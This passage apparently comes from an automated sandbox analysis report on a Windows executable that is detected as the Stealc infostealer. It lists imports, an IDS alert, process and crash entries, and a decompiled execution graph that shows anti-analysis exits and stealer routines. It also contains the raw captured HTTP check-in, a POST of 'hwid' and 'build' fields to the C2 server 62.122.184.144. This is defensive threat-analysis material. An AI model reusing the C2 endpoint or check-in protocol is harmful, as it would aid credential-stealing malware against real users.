GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
                                        USER32.dllSetFocus
                                        Language of compilation systemCountry where language is spokenMap
                                        TurkishTurkey
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-08T18:48:09.342481+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54970462.122.184.14480TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 8, 2024 18:48:08.281151056 CEST4970480192.168.2.562.122.184.144
                                        Oct 8, 2024 18:48:08.286207914 CEST804970462.122.184.144192.168.2.5
                                        Oct 8, 2024 18:48:08.286293030 CEST4970480192.168.2.562.122.184.144
                                        Oct 8, 2024 18:48:08.286413908 CEST4970480192.168.2.562.122.184.144
                                        Oct 8, 2024 18:48:08.291239023 CEST804970462.122.184.144192.168.2.5
                                        Oct 8, 2024 18:48:08.992774963 CEST804970462.122.184.144192.168.2.5
                                        Oct 8, 2024 18:48:08.992849112 CEST4970480192.168.2.562.122.184.144
                                        Oct 8, 2024 18:48:08.996458054 CEST4970480192.168.2.562.122.184.144
                                        Oct 8, 2024 18:48:09.002341032 CEST804970462.122.184.144192.168.2.5
                                        Oct 8, 2024 18:48:09.342236996 CEST804970462.122.184.144192.168.2.5
                                        Oct 8, 2024 18:48:09.342480898 CEST4970480192.168.2.562.122.184.144
                                        Oct 8, 2024 18:48:14.347692966 CEST804970462.122.184.144192.168.2.5
                                        Oct 8, 2024 18:48:14.347786903 CEST4970480192.168.2.562.122.184.144
                                        Oct 8, 2024 18:48:27.453022957 CEST4970480192.168.2.562.122.184.144
                                        • 62.122.184.144
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.54970462.122.184.144803496C:\Users\user\Desktop\mJXdkcP4Wx.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 8, 2024 18:48:08.286413908 CEST89OUTGET / HTTP/1.1
                                        Host: 62.122.184.144
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Oct 8, 2024 18:48:08.992774963 CEST203INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 16:48:08 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Content-Length: 0
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Oct 8, 2024 18:48:08.996458054 CEST420OUTPOST /f88d87a7e087e100.php HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC
                                        Host: 62.122.184.144
                                        Content-Length: 219
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 41 35 37 34 41 36 33 46 44 31 34 31 33 30 36 38 39 37 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 35 5f 70 61 6c 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 2d 2d 0d 0a
                                        Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="hwid"EDA574A63FD14130689737------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="build"default5_pal------AKECBFBAEBKJJJJKFCGC--
                                        Oct 8, 2024 18:48:09.342236996 CEST210INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 16:48:09 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Content-Length: 8
                                        Keep-Alive: timeout=5, max=99
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 59 6d 78 76 59 32 73 3d
                                        Data Ascii: YmxvY2s=


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:12:47:55
                                        Start date:08/10/2024
                                        Path:C:\Users\user\Desktop\mJXdkcP4Wx.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\mJXdkcP4Wx.exe"
                                        Imagebase:0x400000
                                        File size:342'528 bytes
                                        MD5 hash:BE89DDDEE1630CDE41B95D2DF6070BD3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2338388103.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2338357081.0000000000769000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2081526955.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:12:48:01
                                        Start date:08/10/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 804
                                        Imagebase:0xa50000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:12:48:02
                                        Start date:08/10/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 804
                                        Imagebase:0xa50000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:12:48:02
                                        Start date:08/10/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 828
                                        Imagebase:0xa50000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:12:48:04
                                        Start date:08/10/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 860
                                        Imagebase:0xa50000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:12
                                        Start time:12:48:05
                                        Start date:08/10/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 884
                                        Imagebase:0xa50000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:14
                                        Start time:12:48:06
                                        Start date:08/10/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 1104
                                        Imagebase:0xa50000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:16
                                        Start time:12:48:09
                                        Start date:08/10/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 1060
                                        Imagebase:0xa50000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:6.5%
                                          Dynamic/Decrypted Code Coverage:4.9%
                                          Signature Coverage:12.3%
                                          Total number of Nodes:1417
                                          Total number of Limit Nodes:28
                                          execution_graph 27680 409440 strlen malloc strcpy_s free std::exception::exception 27718 22c932a ??2@YAPAXI RaiseException allocator 27780 22d1525 strtok_s strtok_s lstrlen lstrcpy ctype 27738 41ce48 LeaveCriticalSection __initptd 27682 41b050 6 API calls 3 library calls 27741 22d1c35 110 API calls 27720 22c9b37 9 API calls 27782 406f60 memcpy 27684 41dc60 atexit 27784 410765 279 API calls 27743 417667 lstrcpy 27685 22d6a0a ExitProcess 27653 22c0005 27658 22c092b GetPEB 27653->27658 27655 22c0030 27659 22c003c 27655->27659 27658->27655 27660 22c0049 27659->27660 27674 22c0e0f SetErrorMode SetErrorMode 27660->27674 27665 22c0265 27666 22c02ce VirtualProtect 27665->27666 27668 22c030b 27666->27668 27667 22c0439 VirtualFree 27669 22c04be 27667->27669 27670 22c05f4 LoadLibraryA 27667->27670 27668->27667 27669->27670 27671 22c04e3 LoadLibraryA 27669->27671 27673 22c08c7 27670->27673 27671->27669 27675 22c0223 27674->27675 27676 22c0d90 27675->27676 27677 22c0dad 27676->27677 27678 22c0dbb GetPEB 27677->27678 27679 22c0238 VirtualAlloc 27677->27679 27678->27679 27679->27665 27786 22dd106 41 API calls __amsg_exit 27744 41b270 5 API calls 2 library calls 27689 22d15b3 18 API calls ctype 27788 22cf567 56 API calls 27789 22cfd67 152 API calls 27690 41bc11 71 API calls 2 library calls 27691 22dbe78 162 API calls 2 library calls 27638 76982e 27639 76983d 27638->27639 27642 769fce 27639->27642 27644 769fe9 27642->27644 27643 769ff2 CreateToolhelp32Snapshot 27643->27644 27645 76a00e Module32First 27643->27645 27644->27643 27644->27645 27646 769846 27645->27646 27647 76a01d 27645->27647 27649 769c8d 27647->27649 27650 769cb8 27649->27650 27651 769d01 27650->27651 27652 769cc9 VirtualAlloc 27650->27652 27651->27651 27652->27651 27692 22dcd97 170 API calls 2 library calls 27693 22d6a40 6 API calls 27694 41ac2c 71 API calls ctype 27695 22d3b7d 91 API calls 2 library calls 27750 22d102b strtok_s lstrlen lstrcpy 27792 22d6d18 643 API calls 27751 22d6c57 689 API calls 27753 22d140b strtok_s 27754 22dd0af RtlLeaveCriticalSection type_info::_Type_info_dtor 27696 22d32ae 22 API calls 27697 4090c3 5 API calls allocator 27755 22d140b StrCmpCA strtok_s 27794 22dcd90 173 API calls 3 library calls 27699 22c6ebc VirtualProtect 27796 41abd0 free std::exception::_Tidy ctype 27757 22d04b7 88 API calls 27797 413916 91 API calls 2 library calls 27758 22d0cb6 30 API calls 27798 4183dc 15 API calls 27799 22dcd8f 6 API calls 2 library calls 27759 22d102b StrCmpCA strtok_s lstrlen lstrcpy 27800 22d118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27703 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27761 41ceea SetUnhandledExceptionFilter 27762 22d3823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 26220 4169f0 26263 402260 26220->26263 26237 417850 3 API calls 26238 416a30 26237->26238 26239 4178e0 3 API calls 26238->26239 26240 416a43 26239->26240 26396 41a9b0 26240->26396 26242 416a64 26243 41a9b0 4 API calls 26242->26243 26244 416a6b 26243->26244 26245 41a9b0 4 API calls 26244->26245 26246 416a72 26245->26246 26247 41a9b0 4 API calls 26246->26247 26248 416a79 26247->26248 26249 41a9b0 4 API calls 26248->26249 26250 416a80 26249->26250 26404 41a8a0 26250->26404 26252 416b0c 26408 416920 GetSystemTime 26252->26408 26254 416a89 26254->26252 26256 416ac2 OpenEventA 26254->26256 26257 416af5 CloseHandle Sleep 26256->26257 26258 416ad9 26256->26258 26260 416b0a 26257->26260 26262 416ae1 CreateEventA 26258->26262 26260->26254 26261 416b16 CloseHandle ExitProcess 26262->26252 26605 4045c0 17 API calls 26263->26605 26265 402274 26266 4045c0 34 API calls 26265->26266 26267 40228d 26266->26267 26268 4045c0 34 API calls 26267->26268 26269 4022a6 26268->26269 26270 4045c0 34 API calls 26269->26270 26271 4022bf 26270->26271 26272 4045c0 34 API calls 26271->26272 26273 4022d8 26272->26273 26274 4045c0 34 API calls 26273->26274 26275 4022f1 26274->26275 26276 4045c0 34 API calls 26275->26276 26277 40230a 26276->26277 26278 4045c0 34 API calls 26277->26278 26279 402323 26278->26279 26280 4045c0 34 API calls 26279->26280 26281 40233c 26280->26281 26282 4045c0 34 API calls 26281->26282 26283 402355 26282->26283 26284 4045c0 34 API calls 26283->26284 26285 40236e 26284->26285 26286 4045c0 34 API calls 26285->26286 26287 402387 26286->26287 26288 4045c0 34 API calls 26287->26288 26289 4023a0 26288->26289 26290 4045c0 34 API calls 26289->26290 26291 4023b9 26290->26291 26292 4045c0 34 API calls 26291->26292 26293 4023d2 26292->26293 26294 4045c0 34 API calls 26293->26294 26295 4023eb 26294->26295 26296 4045c0 34 API calls 26295->26296 26297 402404 26296->26297 26298 4045c0 34 API calls 26297->26298 26299 40241d 26298->26299 26300 4045c0 34 API calls 26299->26300 26301 402436 26300->26301 26302 4045c0 34 API calls 26301->26302 26303 40244f 26302->26303 26304 4045c0 34 API calls 26303->26304 26305 402468 26304->26305 26306 4045c0 34 API calls 26305->26306 26307 402481 26306->26307 26308 4045c0 34 API calls 26307->26308 26309 40249a 26308->26309 26310 4045c0 34 API calls 26309->26310 26311 4024b3 26310->26311 26312 4045c0 34 API calls 26311->26312 26313 4024cc 26312->26313 26314 4045c0 34 API calls 26313->26314 26315 4024e5 26314->26315 26316 4045c0 34 API calls 26315->26316 26317 4024fe 26316->26317 26318 4045c0 34 API calls 26317->26318 26319 402517 26318->26319 26320 4045c0 34 API calls 26319->26320 26321 402530 26320->26321 26322 4045c0 34 API calls 26321->26322 26323 402549 26322->26323 26324 4045c0 34 API calls 26323->26324 26325 402562 26324->26325 26326 4045c0 34 API calls 26325->26326 26327 40257b 26326->26327 26328 4045c0 34 API calls 26327->26328 26329 402594 26328->26329 26330 4045c0 34 API calls 26329->26330 26331 4025ad 26330->26331 26332 4045c0 34 API calls 26331->26332 26333 4025c6 26332->26333 26334 4045c0 34 API calls 26333->26334 26335 4025df 26334->26335 26336 4045c0 34 API calls 26335->26336 26337 4025f8 26336->26337 26338 4045c0 34 API calls 26337->26338 26339 402611 26338->26339 26340 4045c0 34 API calls 26339->26340 26341 40262a 26340->26341 26342 4045c0 34 API calls 26341->26342 26343 402643 26342->26343 26344 4045c0 34 API calls 26343->26344 26345 40265c 26344->26345 26346 4045c0 34 API calls 26345->26346 26347 402675 26346->26347 26348 4045c0 34 API calls 26347->26348 26349 40268e 26348->26349 26350 419860 26349->26350 26609 419750 GetPEB 26350->26609 26352 419868 26353 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26352->26353 26354 41987a 26352->26354 26355 419af4 GetProcAddress 26353->26355 26356 419b0d 26353->26356 26357 41988c 21 API calls 26354->26357 26355->26356 26358 419b46 26356->26358 26359 419b16 GetProcAddress GetProcAddress 26356->26359 26357->26353 26360 419b68 26358->26360 26361 419b4f GetProcAddress 26358->26361 26359->26358 26362 419b71 GetProcAddress 26360->26362 26363 419b89 26360->26363 26361->26360 26362->26363 26364 416a00 26363->26364 26365 419b92 GetProcAddress GetProcAddress 26363->26365 26366 41a740 26364->26366 26365->26364 26367 41a750 26366->26367 26368 416a0d 26367->26368 26369 41a77e lstrcpy 26367->26369 26370 4011d0 26368->26370 26369->26368 26371 4011e8 26370->26371 26372 401217 26371->26372 26373 40120f ExitProcess 26371->26373 26374 401160 GetSystemInfo 26372->26374 26375 401184 26374->26375 26376 40117c ExitProcess 26374->26376 26377 401110 GetCurrentProcess VirtualAllocExNuma 26375->26377 26378 401141 ExitProcess 26377->26378 26379 401149 26377->26379 26610 4010a0 VirtualAlloc 26379->26610 26382 401220 26614 4189b0 26382->26614 26385 401249 __aulldiv 26386 40129a 26385->26386 26387 401292 ExitProcess 26385->26387 26388 416770 GetUserDefaultLangID 26386->26388 26389 4167d3 GetUserDefaultLCID 26388->26389 26390 416792 26388->26390 26389->26237 26390->26389 26391 4167c1 ExitProcess 26390->26391 26392 4167a3 ExitProcess 26390->26392 26393 4167b7 ExitProcess 26390->26393 26394 4167cb ExitProcess 26390->26394 26395 4167ad ExitProcess 26390->26395 26616 41a710 26396->26616 26398 41a9c1 lstrlenA 26400 41a9e0 26398->26400 26399 41aa18 26617 41a7a0 26399->26617 26400->26399 26402 41a9fa lstrcpy lstrcatA 26400->26402 26402->26399 26403 41aa24 26403->26242 26405 41a8bb 26404->26405 26406 41a90b 26405->26406 26407 41a8f9 lstrcpy 26405->26407 26406->26254 26407->26406 26621 416820 26408->26621 26410 41698e 26411 416998 sscanf 26410->26411 26650 41a800 26411->26650 26413 4169aa SystemTimeToFileTime SystemTimeToFileTime 26414 4169e0 26413->26414 26415 4169ce 26413->26415 26417 415b10 26414->26417 26415->26414 26416 4169d8 ExitProcess 26415->26416 26418 415b1d 26417->26418 26419 41a740 lstrcpy 26418->26419 26420 415b2e 26419->26420 26652 41a820 lstrlenA 26420->26652 26423 41a820 2 API calls 26424 415b64 26423->26424 26425 41a820 2 API calls 26424->26425 26426 415b74 26425->26426 26656 416430 26426->26656 26429 41a820 2 API calls 26430 415b93 26429->26430 26431 41a820 2 API calls 26430->26431 26432 415ba0 26431->26432 26433 41a820 2 API calls 26432->26433 26434 415bad 26433->26434 26435 41a820 2 API calls 26434->26435 26436 415bf9 26435->26436 26665 4026a0 26436->26665 26444 415cc3 26445 416430 lstrcpy 26444->26445 26446 415cd5 26445->26446 26447 41a7a0 lstrcpy 26446->26447 26448 415cf2 26447->26448 26449 41a9b0 4 API calls 26448->26449 26450 415d0a 26449->26450 26451 41a8a0 lstrcpy 26450->26451 26452 415d16 26451->26452 26453 41a9b0 4 API calls 26452->26453 26454 415d3a 26453->26454 26455 41a8a0 lstrcpy 26454->26455 26456 415d46 26455->26456 26457 41a9b0 4 API calls 26456->26457 26458 415d6a 26457->26458 26459 41a8a0 lstrcpy 26458->26459 26460 415d76 26459->26460 26461 41a740 lstrcpy 26460->26461 26462 415d9e 26461->26462 27391 417500 GetWindowsDirectoryA 26462->27391 26465 41a7a0 lstrcpy 26466 415db8 26465->26466 27401 404880 26466->27401 26468 415dbe 27547 4117a0 26468->27547 26470 415dc6 26471 41a740 lstrcpy 26470->26471 26472 415de9 26471->26472 26473 401590 lstrcpy 26472->26473 26474 415dfd 26473->26474 27567 405960 39 API calls ctype 26474->27567 26476 415e03 27568 411050 strtok_s strtok_s lstrlenA lstrcpy 26476->27568 26478 415e0e 26479 41a740 lstrcpy 26478->26479 26480 415e32 26479->26480 26481 401590 lstrcpy 26480->26481 26482 415e46 26481->26482 27569 405960 39 API calls ctype 26482->27569 26484 415e4c 27570 410d90 7 API calls 26484->27570 26486 415e57 26487 41a740 lstrcpy 26486->26487 26488 415e79 26487->26488 26489 401590 lstrcpy 26488->26489 26490 415e8d 26489->26490 27571 405960 39 API calls ctype 26490->27571 26492 415e93 27572 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26492->27572 26494 415e9e 26495 401590 lstrcpy 26494->26495 26496 415eb5 26495->26496 27573 411a10 121 API calls 26496->27573 26498 415eba 26499 41a740 lstrcpy 26498->26499 26500 415ed6 26499->26500 27574 404fb0 8 API calls 26500->27574 26502 415edb 26503 401590 lstrcpy 26502->26503 26504 415f5b 26503->26504 27575 410740 292 API calls 26504->27575 26506 415f60 26507 41a740 lstrcpy 26506->26507 26508 415f86 26507->26508 26509 401590 lstrcpy 26508->26509 26510 415f9a 26509->26510 27576 405960 39 API calls ctype 26510->27576 26512 415fa0 27577 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26512->27577 26514 415fab 26515 401590 lstrcpy 26514->26515 26516 415feb 26515->26516 27578 401e80 67 API calls 26516->27578 26518 415ff0 26519 416000 26518->26519 26520 416092 26518->26520 26522 41a740 lstrcpy 26519->26522 26521 41a7a0 lstrcpy 26520->26521 26523 4160a5 26521->26523 26524 416020 26522->26524 26525 401590 lstrcpy 26523->26525 26526 401590 lstrcpy 26524->26526 26527 4160b9 26525->26527 26528 416034 26526->26528 27582 405960 39 API calls ctype 26527->27582 27579 405960 39 API calls ctype 26528->27579 26531 4160bf 27583 413560 36 API calls 26531->27583 26532 41603a 27580 4112d0 21 API calls ctype 26532->27580 26535 41608a 26539 401590 lstrcpy 26535->26539 26569 41610b 26535->26569 26536 416045 26537 401590 lstrcpy 26536->26537 26538 416085 26537->26538 27581 413dc0 75 API calls 26538->27581 26542 4160e7 26539->26542 26541 401590 lstrcpy 26543 41612b 26541->26543 27584 4140b0 64 API calls ctype 26542->27584 27586 414780 116 API calls ctype 26543->27586 26544 401590 lstrcpy 26551 416150 26544->26551 26546 416155 26547 41617a 26546->26547 26548 401590 lstrcpy 26546->26548 26549 41619f 26547->26549 26554 401590 lstrcpy 26547->26554 26553 416175 26548->26553 26556 4161c4 26549->26556 26562 401590 lstrcpy 26549->26562 27587 414bb0 67 API calls ctype 26551->27587 26552 4160ec 26558 401590 lstrcpy 26552->26558 27588 414d70 75 API calls 26553->27588 26561 41619a 26554->26561 26555 416130 26555->26544 26555->26546 26559 4161e9 26556->26559 26565 401590 lstrcpy 26556->26565 26563 416106 26558->26563 26566 416210 26559->26566 26571 401590 lstrcpy 26559->26571 27589 414f40 69 API calls ctype 26561->27589 26568 4161bf 26562->26568 27585 415100 71 API calls 26563->27585 26570 4161e4 26565->26570 26572 416220 26566->26572 26573 4162b3 26566->26573 27590 407710 125 API calls ctype 26568->27590 26569->26541 26569->26555 27591 415050 67 API calls ctype 26570->27591 26576 416209 26571->26576 26578 41a740 lstrcpy 26572->26578 26577 41a7a0 lstrcpy 26573->26577 27592 419010 54 API calls ctype 26576->27592 26580 4162c6 26577->26580 26581 416241 26578->26581 26583 401590 lstrcpy 26580->26583 26582 401590 lstrcpy 26581->26582 26584 416255 26582->26584 26585 4162da 26583->26585 27593 405960 39 API calls ctype 26584->27593 27596 405960 39 API calls ctype 26585->27596 26588 4162e0 27597 413560 36 API calls 26588->27597 26589 41625b 27594 4112d0 21 API calls ctype 26589->27594 26592 4162ab 26595 41a7a0 lstrcpy 26592->26595 26593 416266 26594 401590 lstrcpy 26593->26594 26596 4162a6 26594->26596 26597 4162fc 26595->26597 27595 413dc0 75 API calls 26596->27595 26599 401590 lstrcpy 26597->26599 26600 416310 26599->26600 27598 405960 39 API calls ctype 26600->27598 26602 41631c 26604 416338 26602->26604 27599 416630 9 API calls ctype 26602->27599 26604->26261 26606 404697 26605->26606 26607 4046ac 11 API calls 26606->26607 26608 40474f 6 API calls 26606->26608 26607->26606 26608->26265 26609->26352 26612 4010c2 ctype 26610->26612 26611 4010fd 26611->26382 26612->26611 26613 4010e2 VirtualFree 26612->26613 26613->26611 26615 401233 GlobalMemoryStatusEx 26614->26615 26615->26385 26616->26398 26618 41a7c2 26617->26618 26619 41a7ec 26618->26619 26620 41a7da lstrcpy 26618->26620 26619->26403 26620->26619 26622 41a740 lstrcpy 26621->26622 26623 416833 26622->26623 26624 41a9b0 4 API calls 26623->26624 26625 416845 26624->26625 26626 41a8a0 lstrcpy 26625->26626 26627 41684e 26626->26627 26628 41a9b0 4 API calls 26627->26628 26629 416867 26628->26629 26630 41a8a0 lstrcpy 26629->26630 26631 416870 26630->26631 26632 41a9b0 4 API calls 26631->26632 26633 41688a 26632->26633 26634 41a8a0 lstrcpy 26633->26634 26635 416893 26634->26635 26636 41a9b0 4 API calls 26635->26636 26637 4168ac 26636->26637 26638 41a8a0 lstrcpy 26637->26638 26639 4168b5 26638->26639 26640 41a9b0 4 API calls 26639->26640 26641 4168cf 26640->26641 26642 41a8a0 lstrcpy 26641->26642 26643 4168d8 26642->26643 26644 41a9b0 4 API calls 26643->26644 26645 4168f3 26644->26645 26646 41a8a0 lstrcpy 26645->26646 26647 4168fc 26646->26647 26648 41a7a0 lstrcpy 26647->26648 26649 416910 26648->26649 26649->26410 26651 41a812 26650->26651 26651->26413 26653 41a83f 26652->26653 26654 415b54 26653->26654 26655 41a87b lstrcpy 26653->26655 26654->26423 26655->26654 26657 41a8a0 lstrcpy 26656->26657 26658 416443 26657->26658 26659 41a8a0 lstrcpy 26658->26659 26660 416455 26659->26660 26661 41a8a0 lstrcpy 26660->26661 26662 416467 26661->26662 26663 41a8a0 lstrcpy 26662->26663 26664 415b86 26663->26664 26664->26429 26666 4045c0 34 API calls 26665->26666 26667 4026b4 26666->26667 26668 4045c0 34 API calls 26667->26668 26669 4026d7 26668->26669 26670 4045c0 34 API calls 26669->26670 26671 4026f0 26670->26671 26672 4045c0 34 API calls 26671->26672 26673 402709 26672->26673 26674 4045c0 34 API calls 26673->26674 26675 402736 26674->26675 26676 4045c0 34 API calls 26675->26676 26677 40274f 26676->26677 26678 4045c0 34 API calls 26677->26678 26679 402768 26678->26679 26680 4045c0 34 API calls 26679->26680 26681 402795 26680->26681 26682 4045c0 34 API calls 26681->26682 26683 4027ae 26682->26683 26684 4045c0 34 API calls 26683->26684 26685 4027c7 26684->26685 26686 4045c0 34 API calls 26685->26686 26687 4027e0 26686->26687 26688 4045c0 34 API calls 26687->26688 26689 4027f9 26688->26689 26690 4045c0 34 API calls 26689->26690 26691 402812 26690->26691 26692 4045c0 34 API calls 26691->26692 26693 40282b 26692->26693 26694 4045c0 34 API calls 26693->26694 26695 402844 26694->26695 26696 4045c0 34 API calls 26695->26696 26697 40285d 26696->26697 26698 4045c0 34 API calls 26697->26698 26699 402876 26698->26699 26700 4045c0 34 API calls 26699->26700 26701 40288f 26700->26701 26702 4045c0 34 API calls 26701->26702 26703 4028a8 26702->26703 26704 4045c0 34 API calls 26703->26704 26705 4028c1 26704->26705 26706 4045c0 34 API calls 26705->26706 26707 4028da 26706->26707 26708 4045c0 34 API calls 26707->26708 26709 4028f3 26708->26709 26710 4045c0 34 API calls 26709->26710 26711 40290c 26710->26711 26712 4045c0 34 API calls 26711->26712 26713 402925 26712->26713 26714 4045c0 34 API calls 26713->26714 26715 40293e 26714->26715 26716 4045c0 34 API calls 26715->26716 26717 402957 26716->26717 26718 4045c0 34 API calls 26717->26718 26719 402970 26718->26719 26720 4045c0 34 API calls 26719->26720 26721 402989 26720->26721 26722 4045c0 34 API calls 26721->26722 26723 4029a2 26722->26723 26724 4045c0 34 API calls 26723->26724 26725 4029bb 26724->26725 26726 4045c0 34 API calls 26725->26726 26727 4029d4 26726->26727 26728 4045c0 34 API calls 26727->26728 26729 4029ed 26728->26729 26730 4045c0 34 API calls 26729->26730 26731 402a06 26730->26731 26732 4045c0 34 API calls 26731->26732 26733 402a1f 26732->26733 26734 4045c0 34 API calls 26733->26734 26735 402a38 26734->26735 26736 4045c0 34 API calls 26735->26736 26737 402a51 26736->26737 26738 4045c0 34 API calls 26737->26738 26739 402a6a 26738->26739 26740 4045c0 34 API calls 26739->26740 26741 402a83 26740->26741 26742 4045c0 34 API calls 26741->26742 26743 402a9c 26742->26743 26744 4045c0 34 API calls 26743->26744 26745 402ab5 26744->26745 26746 4045c0 34 API calls 26745->26746 26747 402ace 26746->26747 26748 4045c0 34 API calls 26747->26748 26749 402ae7 26748->26749 26750 4045c0 34 API calls 26749->26750 26751 402b00 26750->26751 26752 4045c0 34 API calls 26751->26752 26753 402b19 26752->26753 26754 4045c0 34 API calls 26753->26754 26755 402b32 26754->26755 26756 4045c0 34 API calls 26755->26756 26757 402b4b 26756->26757 26758 4045c0 34 API calls 26757->26758 26759 402b64 26758->26759 26760 4045c0 34 API calls 26759->26760 26761 402b7d 26760->26761 26762 4045c0 34 API calls 26761->26762 26763 402b96 26762->26763 26764 4045c0 34 API calls 26763->26764 26765 402baf 26764->26765 26766 4045c0 34 API calls 26765->26766 26767 402bc8 26766->26767 26768 4045c0 34 